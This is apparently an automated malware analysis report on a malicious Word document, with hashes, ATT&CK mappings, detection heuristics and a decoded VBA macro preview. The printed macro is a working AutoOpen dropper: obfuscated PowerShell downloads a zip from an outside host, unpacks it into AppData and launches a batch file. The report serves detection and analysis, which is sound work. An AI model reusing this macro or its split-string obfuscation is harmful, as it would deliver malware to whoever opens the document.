Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08792e071b69c7f3…

MALICIOUS

Office (OLE)

Size: 3.29 MB
Created: 2018-05-07 16:38:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: a90b393d1e2565f6843b0e822783620b
SHA-1: 10853ceb79206002d627766ff93169e1f4a50f5f
SHA-256: 08792e071b69c7f3db6e8ae601ac5bca598397d715607adf549d7fff836b7044
Risk score: 350

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function that executes a PowerShell command. This command is obfuscated but reconstructs to download a file from 'https://updates.mail-dib.ae/updates.zip' and save it as 'updates.zip' in the user's profile directory. The document body also presents a callback phishing lure, asking the user to contact a sales support specialist via phone or email, which is likely a pretext to delay detection while the malicious script executes. The presence of WMI process creation and split string obfuscation further indicates malicious intent.

Heuristics (10)

  • ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Callback phishing phone lure medium SE_CALLBACK_LURE
    Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted, each with the channel that reached it:
    • https://updates.mail-dib.ae/updates.zip (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5367 bytes
SHA-256: 0004350aa7375233e04ef1770ad5de3632ea3ee96dad3574b559d58f23ffdb24
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Sub AutoOpen()
Debugging
color
End Sub




Public Function Debugging() As Variant
Dim Str As String
Str = "p" & "ow" & "er" & "s" & "h" & "el" & "l.exe Set-Vari" & "able X" & "R 'Net.WebClient';"
Str = Str & "SI Var" & "iab" & "le:\Xb9 '" & Environ("USERPROFILE") & "\updates.zip';SI Va" & "ria" & "b" & "le:K 'https://updates.mail-dib.ae/updates.zip';"
Str = Str & "dir ect*;Set-Va" & "ria" & "ble 8J2 (.$Exec" & "utionC" & "ontext.(($Executi" & "onCon" & "text|GM)[6].Na" & "me).(($Execu" & "tionCo" & "ntext.(($Exec" & "utionCon" & "text|GM)[6].Name)|GM)[2].Name).Inv" & "oke($Execution" & "Context.(($Exec" & "ution" & "Context|GM)[6].Name).(($Ex" & "ecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{$_.Name-ilike'*nd*e'}).Name).Invoke('N*-O*',1,1))(GV XR -Value));SV X ((((GV 8J2 -ValueO)|GM)|Where{$_.Name-ilike'Do*e'}).Name);(GV 8J2 -ValueO).((Variable X).Value).Invoke((GV K).Value,(GI Variable:/Xb9).Value);.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM)[2].Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{$_.Name-ilike'*nd*e'}).Name).Invoke('*ke-*pr*',$TRUE,1))([System.String]::Join('',(([IO.File]::ReadAllBytes((GI Variable:/Xb9).Value)|ForEach-Object{(Get-Variable _ -Valu)-As'Char'}))));"
Strr = "p" & "ow" & "er" & "sh" & "el" & "l.ex" & "e  if ($PS" & "Vers" & "ion" & "Ta" & "ble.P" & "SVers" & "ion.Ma" & "jor -gt 2" & "){ p" & "owe" & "rshe" & "l" & "l." & "ex" & "e -nolo" & "go -no" & "pr" & "ofi" & "le -co" & "mma" & "nd "" { Add-Ty" & "pe -A 'Syst" & "em.IO.Compr" & "essi" & "on.Fi" & "leSyst" & "em'; [IO.Comp" & "ressio" & "n.Zip" & "Fi" & "le" & "]::Ext" & "ra" & "ctTo" & "Dir" & "ec" & "to" & "ry('" & Environ("USERPROFILE") & "\up" & "da" & "tes.zip', '" & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\updates'); }"";}"
Strr = Strr & "el" & "se{po" & "we" & "r" & "s" & "h" & "el" & "l.ex" & "e -c" & "om" & "ma" & "nd ""{fun" & "ct" & "io" & "n Exp" & "an" & "dZI" & "PFi" & "le($fi" & "le, $des" & "tin" & "atio" & "n){$s" & "he" & "ll =" & " new-" & "object -com sh" & "el" & "l.a" & "pp" & "lic" & "at" & "i" & "on;$zi" & "p = $sh" & "e" & "ll.Nam" & "eSp" & "ac" & "e($fi" & "le);fo" & "r" & "e" & "ac" & "h(" & "$it" & "em in $zi" & "p.it" & "em" & "s())" & "{$s" & "he" & "ll.N" & "am" & "es" & "pace(" & "$d" & "est" & "in" & "ati" & "on).co" & "pyhe" & "re($it" & "em);}};E" & "xpa" & "ndZ" & "ip" & "Fil" & "e " & Environ("USERPROFILE") & "\up" & "da" & "t" & "es.zi" & "p " & Environ("USERPROFILE") & "\A" & "ppData\Roami" & "ng\Microsoft\Windows\}}"""
Str3 = "p" & "ow" & "er" & "sh" & "el" & "l.e" & "xe if ($PS" & "Vers" & "io" & "nT" & "a" & "ble.P" & "SV" & "er" & "sio" & "n.Ma" & "jor " & "-gt 2){ po" & "we" & "rs" & "h" & "ell.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Win" & "dows_upd" & "ates.tx" & "t " & Environ("USERPROFILE") & "\Windows_updates.cr" & "t;}else{po" & "wer" & "sh" & "el" & "l.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\Wi" & "ndows_u" & "pdates.t" & "xt " & Environ("USERPROFILE") & "\Window" & "s_updates.cr" & "t;}"
Str4 = "p" & "ow" & "er" & "sh" & "e" & "ll.e" & "xe if ($P" & "SVer" & "si" & "onT" & "ab" & "le.PS" & "Ver" & "sio" & "n.Ma" & "jor -gt 2){ p" & "ower" & "sh" & "e" & "l" & "l.e" & "xe " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Windows_updates.bat;}else{po"
... (truncated)